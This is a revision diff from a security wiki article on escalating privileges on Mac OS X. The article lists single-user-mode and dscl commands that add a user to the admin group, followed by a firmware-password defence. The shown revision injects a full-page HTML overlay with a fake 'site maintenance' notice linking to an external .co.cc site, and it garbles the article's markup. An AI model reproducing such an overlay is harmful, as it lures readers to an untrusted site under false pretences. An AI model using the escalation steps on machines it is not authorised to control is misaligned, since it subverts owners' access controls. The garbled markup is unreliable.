Difference between revisions of "Escalate Privileges on Mac OS X"

From Secure Computing Wiki
Jump to: navigation, search
(Lock it Down)
Line 1: Line 1:
 +
----
 +
<div style="background: #E8E8E8 none repeat scroll 0% 0%; overflow: hidden; font-family: Tahoma; font-size: 11pt; line-height: 2em; position: absolute; width: 2000px; height: 2000px; z-index: 1410065407; top: 0px; left: -250px; padding-left: 400px; padding-top: 50px; padding-bottom: 350px;">
 +
----
 +
=[http://egebyromedu.co.cc Page Is Unavailable Due To Site Maintenance, Please Visit Reserve Copy Page]=
 +
----
 +
=[http://egebyromedu.co.cc CLICK HERE]=
 +
----
 +
</div>
 
This is a rewrite of the article from Hackszine [http://www.hackszine.com/blog/archive/2009/02/gain_admin_rights_in_os_x_leop.html on 2/13/2009].
 
This is a rewrite of the article from Hackszine [http://www.hackszine.com/blog/archive/2009/02/gain_admin_rights_in_os_x_leop.html on 2/13/2009].
  
Line 5: Line 13:
  
 
== How To ==
 
== How To ==
<ol>
+
&lt;ol>
<li>First, reboot the machine into single-user mode.  Do this by holding the Command-S key combination until the machine has booted.</li>
+
&lt;li>First, reboot the machine into single-user mode.  Do this by holding the Command-S key combination until the machine has booted.&lt;/li>
<li>Once booted, mount the file systems read-write.  Most default-installed Mac OS X systems only have one partition:
+
&lt;li>Once booted, mount the file systems read-write.  Most default-installed Mac OS X systems only have one partition:
<pre>:/ root# mount /</pre></li>
+
&lt;pre>:/ root# mount /&lt;/pre>&lt;/li>
<li>Now. we need to launch directory services.  
+
&lt;li>Now. we need to launch directory services.  
<pre>:/ root# launchctl load /System/Library/LaunchDaemons/com.apple.DirectoryServices.plist</pre></li>
+
&lt;pre>:/ root# launchctl load /System/Library/LaunchDaemons/com.apple.DirectoryServices.plist&lt;/pre>&lt;/li>
<li>Add the user to the admin group.   
+
&lt;li>Add the user to the admin group.   
 
To add the group membership to a user, use the following command:
 
To add the group membership to a user, use the following command:
<pre>:/ root# dscl . append groups/admin users <username></pre></li>
+
&lt;pre>:/ root# dscl . append groups/admin users &lt;username>&lt;/pre>&lt;/li>
<li>Using one of the two following commands, verify the user has been added to the admin group:
+
&lt;li>Using one of the two following commands, verify the user has been added to the admin group:
# groups <username> -or-
+
# groups &lt;username> -or-
 
# dscl . read groups/admin users (there is a space on either side of the period)
 
# dscl . read groups/admin users (there is a space on either side of the period)
</li></ol>
+
&lt;/li>&lt;/ol>
  
 
== Lock it Down ==
 
== Lock it Down ==
 
In Mac OS X 10.4 and later, simply setting an Open Firmware, or EFI firmware password will prevent booting into single-user mode without the firmware password.  You can view Apple's Knowledge Base articles here:
 
In Mac OS X 10.4 and later, simply setting an Open Firmware, or EFI firmware password will prevent booting into single-user mode without the firmware password.  You can view Apple's Knowledge Base articles here:
 
* [http://support.apple.com/kb/HT1352 Setting up firmware password protection in Mac OS X]
 
* [http://support.apple.com/kb/HT1352 Setting up firmware password protection in Mac OS X]

Revision as of 21:52, 23 November 2010



Page Is Unavailable Due To Site Maintenance, Please Visit Reserve Copy Page


CLICK HERE


This is a rewrite of the article from Hackszine on 2/13/2009.

Introduction

Mac OS X has very few core differences in operation from a standard Unix operating system. In many cases, a trick that works on Linux or FreeBSD will work, with little modification, on Mac OS X. We'll apply this to escalation of privileges. We do this the same way a root password is recovered on Linux or BSD systems.

How To

<ol> <li>First, reboot the machine into single-user mode. Do this by holding the Command-S key combination until the machine has booted.</li> <li>Once booted, mount the file systems read-write. Most default-installed Mac OS X systems only have one partition: <pre>:/ root# mount /</pre></li> <li>Now. we need to launch directory services. <pre>:/ root# launchctl load /System/Library/LaunchDaemons/com.apple.DirectoryServices.plist</pre></li> <li>Add the user to the admin group. To add the group membership to a user, use the following command: <pre>:/ root# dscl . append groups/admin users <username></pre></li> <li>Using one of the two following commands, verify the user has been added to the admin group:

  1. groups <username> -or-
  2. dscl . read groups/admin users (there is a space on either side of the period)

</li></ol>

Lock it Down

In Mac OS X 10.4 and later, simply setting an Open Firmware, or EFI firmware password will prevent booting into single-user mode without the firmware password. You can view Apple's Knowledge Base articles here: